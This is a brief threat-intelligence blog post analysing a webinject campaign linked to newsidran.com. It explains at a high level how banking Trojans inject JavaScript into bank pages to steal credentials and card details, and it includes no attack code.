Fraud
December 12, 2015

Webinject Analysis: Newsidran.com

article
2 min. read
By Elman Reyes

 

Webinject attacks modify webpages to allow fraudsters to collect credentials, or act more directly against user accounts. The newsidron.com script injection serves as a good example of how these attacks are conducted, detected, and ultimately stopped.

A Trojan is a piece of malware that appears to the user to perform a desirable function, but actually steals information or harms the system (perhaps in addition to the expected function). Trojans employ two main techniques to steal users' credentials or initiate money transfers on their behalf: modifying the website's client-side web page, or sniffing the browser's activity for information that is sent to different banks before the packets are encrypted by SSL.

Recently several e-banking Trojans (Zeus, Cridex, and Citadel, for instance) have used script injection techniques to modify the original web page. The modification may enable the attacker to perform money transactions using victims' credentials. This may be perpetrated by a Trojan injecting a malicious JavaScript code to the client's browser, once the client is connected to the website. The injected code performs different functions, including attempting a money transfer from the client's account, gaining control on mobile devices, and much more. To maintain the information sent by the Trojans, attackers have developed different types of command and control (C&C) systems that enable them to grab and manage the injected code and its functions These systems are usually PHP-based systems accompanied by a SQL database.

For the newsidran.com example, the malware on an infected machine establishes a few variables before the injection takes place, the most substantial of which are:

  • fAkEbotid.
  • fAkEbotname.

This initial prompt for the webinject asks for various pieces of credit card information. Note that all communication and resources (such as images and scripts) used by this attack are injected from the same newsidran.com domain name.

To see the full version of this report, click "Download" below.

 

Need-to-Know

Expertly picked stories on threat intelligence

Hundreds of apps will be attacked by the time you read this.

So, we get to work. We obsess over effective attack methods. We monitor the growth of IoT and its evolving threats. We dive deep into the latest crypto-mining campaigns. We analyze banking Trojan targets. We dissect exploits. We hunt for the latest malware. And then our team of experts share it all with you. For more than 20 years, F5 has been leading the app delivery space. With our experience, we are passionate about educating the security community-providing the intel you need to stay informed so your apps can stay safe.

Every

9 hrs

a critical vulnerability—with the potential for remote code execution—is released.